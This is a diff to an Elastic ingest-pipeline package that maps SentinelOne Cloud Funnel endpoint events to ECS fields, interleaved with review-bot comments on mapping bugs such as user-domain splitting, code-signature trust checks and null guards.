@@ -199,6 +199,17 @@ processors: field: host.os.platform copy_from: sentinel_one_cloud_funnel.event.endpoint.os ignore_empty_value: true + - set: + field: host.os.type + copy_from: sentinel_one_cloud_funnel.event.endpoint.os + if: >- + [ + 'linux', + 'windows', + 'macos', + 'ios', + 'android' + ].contains(ctx.sentinel_one_cloud_funnel?.event?.endpoint?.os) - append: field: related.hosts value: '{{{sentinel_one_cloud_funnel.event.endpoint.os}}}' @@ -229,6 +240,10 @@ processors: field: json.src.process.image.path target_field: sentinel_one_cloud_funnel.event.src.process.image.path ignore_missing: true + - set: + field: process.executable + copy_from: sentinel_one_cloud_funnel.event.src.process.image.path + ignore_empty_value: true - rename: field: json.src.process.image.md5 target_field: sentinel_one_cloud_funnel.event.src.process.image.md5 @@ -554,6 +569,19 @@ processors: field: process.user.name copy_from: sentinel_one_cloud_funnel.event.src.process.user.name ignore_empty_value: true + - set: + field: user.name + copy_from: process.user.name + ignore_empty_value: true + - set: + field: user.domain + copy_from: process.user.name + ignore_empty_value: true + - dissect: + field: process.user.name + pattern: '%{user.domain}\%{user.name}' + if: ctx.process?.user?.name?.contains('\\') == true + description: "Split user and domain" - rename: field: json.src.process.eUserName target_field: sentinel_one_cloud_funnel.event.src.process.e_user.name @@ -595,6 +623,10 @@ processors: field: json.agent.uuid target_field: sentinel_one_cloud_funnel.event.agent.uuid ignore_missing: true + - set: + field: host.id + copy_from: sentinel_one_cloud_funnel.event.agent.uuid + ignore_empty_value: true - rename: field: json.agent.version target_field: sentinel_one_cloud_funnel.event.agent.version 
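Review bot: In the @@ -554,6 +569,19 @@ hunk the second `set` copies `process.user.name` into `user.domain` unconditionally, so any account name without a `DOMAIN\user` separator ends up with a domain equal to the user name — the Linux fixture in this same commit shows `"domain": "root", "name": "root"`. The `dissect` that follows already fills both `user.domain` and `user.name` whenever a backslash is present, so the `set` with `field: user.domain` should simply be removed and `user.domain` left unset when no domain was observed. Detection content that pivots on `user.domain` would otherwise match on fabricated domain values. The enclosing `processors` list starts and ends outside this hunk.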
@@ -1457,6 +1489,10 @@ processors: field: json.src.process.parent.image.path target_field: sentinel_one_cloud_funnel.event.src.process.parent.image.path ignore_missing: true + - set: + field: process.parent.executable + copy_from: sentinel_one_cloud_funnel.event.src.process.parent.image.path + ignore_empty_value: true - rename: field: json.src.process.parent.integrityLevel target_field: sentinel_one_cloud_funnel.event.src.process.parent.integrity_level @@ -1868,6 +1904,14 @@ processors: field: json.src.process.signedStatus target_field: sentinel_one_cloud_funnel.event.src.process.signed_status ignore_missing: true + - set: + field: process.code_signature.exists + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.signed_status == 'signed' + - set: + field: process.code_signature.exists + value: false + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.signed_status == 'unsigned' - convert: field: json.src.process.tgtFileDeletionCount tag: 'convert_json_src_process_tgtFileDeletionCount' @@ -1976,10 +2020,23 @@ processors: field: json.src.process.publisher target_field: sentinel_one_cloud_funnel.event.src.process.publisher ignore_missing: true + - set: + field: process.code_signature.subject_name + copy_from: sentinel_one_cloud_funnel.event.src.process.publisher + ignore_empty_value: true - rename: field: json.src.process.verifiedStatus target_field: sentinel_one_cloud_funnel.event.src.process.verified_status ignore_missing: true + - set: + field: process.code_signature.trusted + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.verified_status?.contains('verified') == true + - set: + field: process.code_signature.trusted + value: false + override: false + if: ctx.process?.code_signature?.exists == true - rename: field: json.driver.certificate.thumbprint target_field: sentinel_one_cloud_funnel.event.driver.certificate.thumbprint.value 
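Review bot: In the @@ -1976,10 +2020,23 @@ hunk `process.code_signature.trusted` is set to true when `verified_status?.contains('verified')`, which is a substring test — any value that merely contains that word (a hypothetical `unverified`, should the feed ever emit one) would also flag the signature as trusted, and a false `trusted: true` is the costly direction for any rule that uses this field as a trust signal. The `signed_status` checks in the @@ -1868 hunk use equality, so for consistency and safety the condition should be `if: ctx.sentinel_one_cloud_funnel?.event?.src?.process?.verified_status == 'verified'`. If the source is known to send only `verified` and values without that substring, a one-line comment saying so would justify keeping `contains`. The enclosing `processors` list continues outside this hunk.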
@@ -2702,6 +2759,96 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + # This must happen after the pipelines since the process pipeline also touches process.command_line. + description: Implements Windows-like SplitCommandLine + lang: painless + if: |- + (ctx.process?.command_line != null && ctx.process.command_line != "") || + (ctx.process?.parent?.command_line != null && ctx.process.parent.command_line != "") + source: |- + // appendBSBytes appends n '\\' bytes to b and returns the resulting slice. + def appendBSBytes(StringBuilder b, int n) { + for (; n > 0; n--) { + b.append('\\'); + } + return b; + } + + // readNextArg splits command line string cmd into next + // argument and command line remainder. + def readNextArg(String cmd) { + def b = new StringBuilder(); + boolean inquote; + int nslash; + for (; cmd.length() > 0; cmd = cmd.substring(1)) { + def c = cmd.charAt(0); + if (c == (char)' ' || c == (char)0x09) { + if (!inquote) { + return [ + "arg": appendBSBytes(b, nslash).toString(), + "rest": cmd.substring(1) + ]; + } + } else if (c == (char)'"') { + b = appendBSBytes(b, nslash/2); + if (nslash%2 == 0) { + // use "Prior to 2008" rule from + // http://daviddeley.com/autohotkey/parameters/parameters.htm + // section 5.2 to deal with double double quotes + if (inquote && cmd.length() > 1 && cmd.charAt(1) == (char)'"') { + b.append(c); + cmd = cmd.substring(1); + } + inquote = !inquote; + } else { + b.append(c); + } + nslash = 0; + continue; + } else if (c == (char)'\\') { + nslash++; + continue; + } + b = appendBSBytes(b, nslash); + nslash = 0; + b.append(c); + } + return [ + "arg": appendBSBytes(b, nslash).toString(), + "rest": '' + ]; + } + + // commandLineToArgv splits a command line into individual argument + // strings, following the Windows 
conventions documented + // at http://daviddeley.com/autohotkey/parameters/parameters.htm#WINARGV + // Original implementation found at: https://github.com/golang/go/commit/39c8d2b7faed06b0e91a1ad7906231f53aab45d1 + def commandLineToArgv(String cmd) { + def args = new ArrayList(); + while (cmd.length() > 0) { + if (cmd.charAt(0) == (char)' ' || cmd.charAt(0) == (char)0x09) { + cmd = cmd.substring(1); + continue; + } + def next = readNextArg(cmd); + cmd = next.rest; + args.add(next.arg); + } + return args; + } + + def cmd = ctx.process?.command_line; + if (cmd != null && cmd != "") { + ctx.process.args = commandLineToArgv(cmd); + ctx.process.args_count = ctx.process.args.length; + } + + def parentCmd = ctx.process?.parent?.command_line; + if (parentCmd != null && parentCmd != "") { + ctx.process.parent.args = commandLineToArgv(parentCmd); + ctx.process.parent.args_count = ctx.process.parent.args.length; + } - remove: field: json ignore_missing: true diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml index d05e538b431..af2ae2c3c3b 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-command-script.yml @@ -28,6 +28,10 @@ processors: field: json.cmdScript.content target_field: sentinel_one_cloud_funnel.event.cmd_script.content ignore_missing: true + - set: + field: powershell.file.script_block_text + copy_from: sentinel_one_cloud_funnel.event.cmd_script.content + ignore_empty_value: true - convert: field: json.cmdScript.isComplete tag: 'convert_json_cmdScript_isComplete' 
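Review bot: The `@@ -2702,6 +2759,96 @@` hunk applies Windows `CommandLineToArgv` splitting rules to every event's `process.command_line` and `process.parent.command_line`, while the earlier hunk in this file populates `host.os.type` with values including `linux`, `macos` and `android`; on those hosts a backslash is a path or shell-escape character with different semantics, so the resulting `process.args` would be misleading. Consider gating the script on host type, for example prefixing the `if` with `ctx.host?.os?.type == 'windows' &&`, or state in the `description` that the split is only meaningful for Windows endpoints. The per-character `cmd = cmd.substring(1)` copy also makes `readNextArg` quadratic in command-line length; probably fine for typical inputs, but a short comment noting the trade-off (and that Painless limits loop work per script, if I recall correctly) would help the next maintainer.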
diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml index c9d4e82c9f1..f5a045a4601 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-dns.yml @@ -6,11 +6,18 @@ processors: value: [network] - set: field: event.type - value: [info] + value: [info, protocol] + - set: + field: event.action + value: [lookup_requested] - rename: field: json.event.dns.request target_field: sentinel_one_cloud_funnel.event.dns.request ignore_missing: true + - set: + field: dns.question.name + copy_from: sentinel_one_cloud_funnel.event.dns.request + ignore_empty_value: true - rename: field: json.event.dns.response target_field: sentinel_one_cloud_funnel.event.dns.response diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml index 64f192d6196..bbad4016d03 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-file.yml 
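Review bot: `event.action` is set to a list here (`value: [lookup_requested]`) although ECS defines it as a single keyword, unlike `event.type` and `event.category` which are normalized to arrays; the same list form is used in the file pipeline (`[creation]`, `[deletion]`, `[change]`, `[rename]`), the registry pipeline, and the process pipeline copies the `event.type` array into it. Writing scalars, e.g. `value: lookup_requested`, keeps the field shaped like other integrations and like rules that compare `event.action` as a plain string. Applies to each of those hunks; noted once here.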
@@ -4,21 +4,50 @@ processors: - set: field: event.category value: [file] - - set: - field: event.type - value: [info] - set: field: event.type value: [creation] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('creat') + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('creat') - set: field: event.type value: [deletion] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('delet') + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('delet') - set: field: event.type value: [change] - if: ctx.sentinel_one_cloud_funnel?.event?.type != null && (ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('change') || ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('modif')) + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('change') || + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('modif') || + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('rename') + ) + - set: + field: event.type + value: [info] + override: false + - set: + field: event.action + value: [creation] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('creat') + - set: + field: event.action + value: [deletion] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('delet') + - set: + field: event.action + value: [change] + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('change') || + 
ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('modif') + ) + - set: + field: event.action + value: [rename] + if: >- + ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel.event.type.toLowerCase().contains('rename') - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -152,6 +181,38 @@ processors: field: file.path copy_from: sentinel_one_cloud_funnel.event.tgt.file.path ignore_empty_value: true + - rename: + field: json.tgt.file.type + target_field: sentinel_one_cloud_funnel.event.tgt.file.type + ignore_missing: true + - set: + field: file.type + copy_from: sentinel_one_cloud_funnel.event.tgt.file.type + ignore_empty_value: true + - script: + lang: painless + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.file?.path instanceof String && ctx.sentinel_one_cloud_funnel.event.tgt.file.path.length() > 1 + source: |- + def path = ctx.sentinel_one_cloud_funnel.event.tgt.file.path; + def idx = path.lastIndexOf("\\"); + if (idx == -1) { + idx = path.lastIndexOf("/"); + } + if (idx > -1) { + if (ctx.file == null) { + ctx.file = new HashMap(); + } + ctx.file.name = path.substring(idx+1); + ctx.file.directory = path.substring(0, idx); + + def extIdx = ctx.file.name.lastIndexOf("."); + if (extIdx > -1 && ctx.file.type == "file") { + ctx.file.extension = ctx.file.name.substring(extIdx+1); + } + } + if (path.indexOf(':') == 1) { + ctx.file.drive_letter = path.substring(0, 1).toUpperCase(); + } - convert: field: json.tgt.file.size tag: 'convert_json_tgt_file_size' 
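Review bot: In the `@@ -152,6 +181,38 @@` hunk's script, `extIdx > -1` treats a leading dot as an extension separator, so a dot-file such as `.bashrc` is given `file.extension: bashrc`, which is not what ECS expects for that case; `if (extIdx > 0 && ctx.file.type == "file")` excludes it. The `ctx.file.type == "file"` gate relies on the `json.tgt.file.type` rename and `file.type` set being moved ahead of the script (the `@@ -167,14 +228,6 @@` hunk removes them from their old position), so a one-line comment on the script such as `# file.type must already be set: the tgt.file.type processors are ordered above on purpose` would save the next reader the hunt.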
@@ -167,14 +228,6 @@ processors: field: file.size copy_from: sentinel_one_cloud_funnel.event.tgt.file.size ignore_empty_value: true - - rename: - field: json.tgt.file.type - target_field: sentinel_one_cloud_funnel.event.tgt.file.type - ignore_missing: true - - set: - field: file.type - copy_from: sentinel_one_cloud_funnel.event.tgt.file.type - ignore_empty_value: true - convert: field: json.src.process.tid tag: 'convert_json_src_process_tid' diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml index e1820501b2d..c83e7cb74a8 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-login.yml @@ -4,9 +4,18 @@ processors: - set: field: event.category value: [authentication] + - set: + field: event.type + value: [start] + if: ctx.sentinel_one_cloud_funnel?.event?.type == 'Login' + - set: + field: event.type + value: [end] + if: ctx.sentinel_one_cloud_funnel?.event?.type == 'Logout' - set: field: event.type value: [info] + override: false - rename: field: json.event.login.userName target_field: sentinel_one_cloud_funnel.event.login.user_name diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml index 623d2b7dc16..7d597eb2cf6 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-network-action.yml 
@@ -6,7 +6,18 @@ processors: value: [network] - set: field: event.type - value: [info] + value: [start, connection] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') + - set: + field: event.action + value: [connection_attempted] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') && + ctx.sentinel_one_cloud_funnel?.event?.network?.direction == "OUTGOING" + - set: + field: event.action + value: [connection_accepted] + if: (ctx.sentinel_one_cloud_funnel?.event?.type == 'IPConnect' || ctx.sentinel_one_cloud_funnel?.event?.type == 'IP Connect') && + ctx.sentinel_one_cloud_funnel?.event?.network?.direction == "INCOMING" - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -73,6 +84,10 @@ processors: field: destination.ip copy_from: sentinel_one_cloud_funnel.event.dst.ip_address ignore_empty_value: true + - set: + field: destination.address + copy_from: sentinel_one_cloud_funnel.event.dst.ip_address + ignore_empty_value: true - convert: field: json.dst.port.number tag: 'convert_json_dst_port_number' @@ -203,6 +218,17 @@ processors: field: json.k8sCluster.podName target_field: sentinel_one_cloud_funnel.event.k8s_cluster.pod.name ignore_missing: true + - append: + field: event.type + value: connection + allow_duplicates: false + if: >- + (ctx.source?.ip != null || ctx.source?.address != null) && ctx.source?.port != null && + (ctx.destination?.ip != null || ctx.destination?.address != null) && ctx.destination?.port != null + - set: + field: event.type + value: [info] + override: false on_failure: - append: field: error.message 
diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml index 6a53d5a7b5f..f086f55e5c4 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-process.yml @@ -6,7 +6,19 @@ processors: value: [process] - set: field: event.type - value: [info] + value: [start] + if: ctx.sentinel_one_cloud_funnel?.event?.meta_event_name == 'PROCESSCREATION' + - set: + field: event.type + value: [end] + if: ( + ctx.sentinel_one_cloud_funnel?.event?.type == 'ProcessExit' || ctx.sentinel_one_cloud_funnel?.event?.type == 'ProcessTermination' || + ctx.sentinel_one_cloud_funnel?.event?.type == 'Process Exit' || ctx.sentinel_one_cloud_funnel?.event?.type == 'Process Termination' + ) + - set: + field: event.action + copy_from: event.type + ignore_empty_value: true - rename: field: json.k8sCluster.containerId target_field: sentinel_one_cloud_funnel.event.k8s_cluster.container.id @@ -265,6 +277,10 @@ processors: field: json.tgt.process.publisher target_field: sentinel_one_cloud_funnel.event.tgt.process.publisher ignore_missing: true + - set: + field: process.code_signature.subject_name + copy_from: sentinel_one_cloud_funnel.event.tgt.process.publisher + ignore_empty_value: true - rename: field: json.tgt.process.reasonSignatureInvalid target_field: sentinel_one_cloud_funnel.event.tgt.process.reason_signature_invalid 
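Review bot: In the `@@ -6,7 +6,19 @@` hunk the unconditional `event.type: [info]` is replaced by two conditional sets, but unlike the login, file and network-action pipelines in this change no fallback is added, so process events that are neither `PROCESSCREATION` nor an exit/termination end up with no `event.type`, and `event.action`, which is copied from it with `ignore_empty_value`, is left unset too. Add the same trailing processor the sibling pipelines use, a `- set:` of `event.type` with `value: [info]` and `override: false`, after the two conditional sets.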
@@ -284,6 +300,14 @@ processors: field: json.tgt.process.signedStatus target_field: sentinel_one_cloud_funnel.event.tgt.process.signed_status ignore_missing: true + - set: + field: process.code_signature.exists + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.signed_status == 'signed' + - set: + field: process.code_signature.exists + value: false + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.signed_status != 'signed' - date: field: json.tgt.process.startTime tag: 'date_json_tgt_process_startTime' @@ -312,6 +336,14 @@ processors: field: json.tgt.process.verifiedStatus target_field: sentinel_one_cloud_funnel.event.tgt.process.verified_status ignore_missing: true + - set: + field: process.code_signature.trusted + value: true + if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.verified_status == 'verified' + - set: + field: process.code_signature.trusted + value: false + if: ctx.process?.code_signature?.exists == true && ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.verified_status != 'verified' - remove: field: - process.parent @@ -327,6 +359,10 @@ processors: field: process.name copy_from: sentinel_one_cloud_funnel.event.tgt.process.name ignore_empty_value: true + - set: + field: process.executable + copy_from: sentinel_one_cloud_funnel.event.tgt.process.image.path + ignore_empty_value: true - convert: field: sentinel_one_cloud_funnel.event.tgt.process.pid target_field: process.pid diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml index 096a22b276f..b205a0636df 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-registry.yml 
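Review bot: In the `@@ -284,6 +300,14 @@` hunk, `process.code_signature.exists` is set to `false` whenever `signed_status != 'signed'`, which is also true when the field is absent, so events that carry no signature information at all are asserted as unsigned; the equivalent block in the default pipeline (`@@ -1868,6 +1904,14 @@` earlier on this page) only writes `false` for `== 'unsigned'`. Use the same exact comparison here, `if: ctx.sentinel_one_cloud_funnel?.event?.tgt?.process?.signed_status == 'unsigned'`, or at least add a `!= null` guard, so an unknown status stays unmapped instead of becoming a negative signal in the data.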
@@ -16,22 +16,59 @@ processors: field: event.type value: [change] if: ctx.sentinel_one_cloud_funnel?.event?.type != null && (ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('change') || ctx.sentinel_one_cloud_funnel?.event?.type.toLowerCase().contains('modif')) + - set: + field: event.action + value: [creation] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluecreate') || + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regkeycreate') + ) + - set: + field: event.action + value: [modification] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluemodified') + - set: + field: event.action + value: [deletion] + if: ctx.sentinel_one_cloud_funnel?.event?.type != null && + ( + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regvaluedelete') || + ctx.sentinel_one_cloud_funnel?.event?.meta_event_name.toLowerCase().contains('regkeydelete') + ) - rename: field: json.registry.keyPath target_field: sentinel_one_cloud_funnel.event.registry.key.path ignore_missing: true - set: - field: registry.key + field: registry.path copy_from: sentinel_one_cloud_funnel.event.registry.key.path ignore_empty_value: true + - script: + lang: painless + if: ctx.registry?.path instanceof String && ctx.registry.path != "" + source: |- + def idx = ctx.registry.path.lastIndexOf('\\'); + if (idx >= 0) { + ctx.registry.key = ctx.registry.path.substring(0, idx); + ctx.registry.value = ctx.registry.path.substring(idx+1); + } - rename: field: json.registry.value target_field: sentinel_one_cloud_funnel.event.registry.val ignore_missing: true - set: - field: registry.value + field: registry.data.strings copy_from: sentinel_one_cloud_funnel.event.registry.val ignore_empty_value: true + - rename: + field: json.registry.valueType + 
target_field: sentinel_one_cloud_funnel.event.registry.value.type + ignore_missing: true + - set: + field: registry.data.type + copy_from: sentinel_one_cloud_funnel.event.registry.value.type + ignore_empty_value: true - rename: field: json.registry.keyUid target_field: sentinel_one_cloud_funnel.event.registry.key.uid diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml index 6a9bc42d44a..2b42e387ae3 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/elasticsearch/ingest_pipeline/pipeline-url.yml @@ -9,6 +9,18 @@ processors: field: url.original copy_from: sentinel_one_cloud_funnel.event.url.address ignore_empty_value: true + - uri_parts: + field: url.original + keep_original: true + ignore_missing: true + - set: + field: destination.address + copy_from: url.domain + ignore_empty_value: true + - registered_domain: + field: destination.address + target_field: destination + if: ctx.destination?.address != null - rename: field: json.event.url.action target_field: sentinel_one_cloud_funnel.event.url.action diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml index f41bd74a7cf..9a5a0eacafb 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/fields/fields.yml @@ -1502,3 +1502,13 @@ description: Complete URL. - name: source type: keyword +- name: powershell.file + type: group + fields: + - name: script_block_text + type: text + analyzer: powershell_script_analyzer + description: > + Text of the executed script block. + + example: ".\\a_script.ps1" 
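Review bot: In the registry pipeline hunk (`@@ -16,22 +16,59 @@`) the three new `event.action` conditions null-check `event.type` but then call `.toLowerCase()` on `event.meta_event_name`; the `?.` before `meta_event_name` only protects against its parent being null, so an event that has a type but no `meta_event_name` raises a NullPointerException inside the `if` and fails the document. Change the guard in each of the three processors to the field actually used: `ctx.sentinel_one_cloud_funnel?.event?.meta_event_name != null &&`. The script that splits `registry.path` into `registry.key` and `registry.value` at the last `\` assumes the vendor path always ends in a value name; if key-only events occur, the last key component would be reported as the value, which deserves a comment on the script.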
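Review bot: In the pipeline-url.yml hunk, `uri_parts` has `ignore_missing: true` but no `ignore_failure` or `on_failure`, so a vendor-supplied `url.original` that is not a parseable URI fails the processor and takes the rest of the document's normal mapping with it; the other processors added here only guard the missing case. Because this value is observed, untrusted content from the endpoint, consider `ignore_failure: true` on the `uri_parts` step, or an `on_failure` that appends to `error.message`, so malformed values still yield an event with `url.original` intact.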
diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml b/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml index a2363f51a90..6d0b4e18062 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/manifest.yml @@ -1,4 +1,12 @@ title: Collect Event logs from SentinelOne Cloud Funnel. +elasticsearch: + index_template: + settings: + analysis: + analyzer: + powershell_script_analyzer: + type: pattern + pattern: '[\W&&[^-]]+' type: logs streams: - input: aws-s3 @@ -184,3 +192,11 @@ streams: default: - forwarded - sentinel_one_cloud_funnel-event + - name: preserve_original_event + required: false + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original`. + type: bool + multi: false + default: false diff --git a/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json b/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json index e22d5ea5ce0..2957f16e8cd 100644 --- a/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json +++ b/packages/sentinel_one_cloud_funnel/data_stream/event/sample_event.json @@ -1,17 +1,17 @@ { "@timestamp": "2022-10-25T07:47:24.180Z", "agent": { - "ephemeral_id": "26afb86c-4349-4dc3-8efa-fe82afd55bcf", - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "ephemeral_id": "82352929-5f46-412e-a787-c016dde956f9", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "name": "docker-fleet-agent", "type": "filebeat", - "version": "8.10.1" + "version": "8.13.0" }, "aws": { "s3": { "bucket": { - "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-47039", - "name": "elastic-package-sentinel-one-bucket-47039" + "arn": "arn:aws:s3:::elastic-package-sentinel-one-bucket-53400", + "name": "elastic-package-sentinel-one-bucket-53400" }, "object": { "key": "command_script.log" 
@@ -30,9 +30,9 @@ "version": "8.11.0" }, "elastic_agent": { - "id": "acba78ef-1401-4689-977c-d8c2e5d6a8fa", + "id": "066f269f-8d0a-49c6-88da-ba06e5a70c88", "snapshot": false, - "version": "8.10.1" + "version": "8.13.0" }, "event": { "agent_id_status": "verified", 
@@ -41,7 +41,7 @@ ], "dataset": "sentinel_one_cloud_funnel.event", "id": "01GG71RXEEHZQFY6XZ1WGS2BAE_168", - "ingested": "2023-11-02T13:59:39Z", + "ingested": "2024-04-04T22:17:38Z", "kind": "event", "original": "{\"timestamp\":\"10:47:24.180\",\"src.process.parent.isStoryline™Root\":false,\"event.category\":\"command_script\",\"src.process.parent.image.sha1\":\"134fd2ad04cf59b0c10596230da5daf6fc711bd1\",\"site.id\":\"123456789123456789\",\"src.process.image.binaryIsExecutable\":true,\"src.process.parent.displayName\":\"MicrosoftCompatibilityTelemetry\",\"src.process.user\":\"NTAUTHORITY\\\\SYSTEM\",\"src.process.parent.subsystem\":\"SYS_WIN32\",\"src.process.indicatorRansomwareCount\":0,\"src.process.crossProcessDupRemoteProcessHandleCount\":0,\"src.process.activeContent.signedStatus\":\"unsigned\",\"src.process.tgtFileCreationCount\":0,\"src.process.indicatorInjectionCount\":0,\"src.process.moduleCount\":284,\"src.process.parent.name\":\"CompatTelRunner.exe\",\"i.version\":\"preprocess-lib-1.0\",\"src.process.activeContentType\":\"CLI\",\"sca:atlantisIngestTime\":1666684057507,\"src.process.image.md5\":\"7353f60b1739074eb17c5f4dddefe239\",\"src.process.indicatorReconnaissanceCount\":8,\"src.process.Storyline™.id\":\"87EE3C19E0250305\",\"src.process.childProcCount\":1,\"mgmt.url\":\"asdf-123.sentinelone.org\",\"src.process.crossProcessOpenProcessCount\":0,\"cmdScript.isComplete\":true,\"src.process.subsystem\":\"SYS_WIN32\",\"meta.event.name\":\"SCRIPTS\",\"src.process.parent.integrityLevel\":\"SYSTEM\",\"src.process.indicatorExploitationCount\":0,\"src.process.parent.Storyline™.id\":\"87EE3C19E0250305\",\"i.scheme\":\"edr\",\"src.process.integrityLevel\":\"SYSTEM\",\"site.name\":\"ASDF\",\"src.process.netConnInCount\":0,\"event.time\":1666684044180,\"account.id\":\"123456789123456789\",\"dataSource.name\":\"Se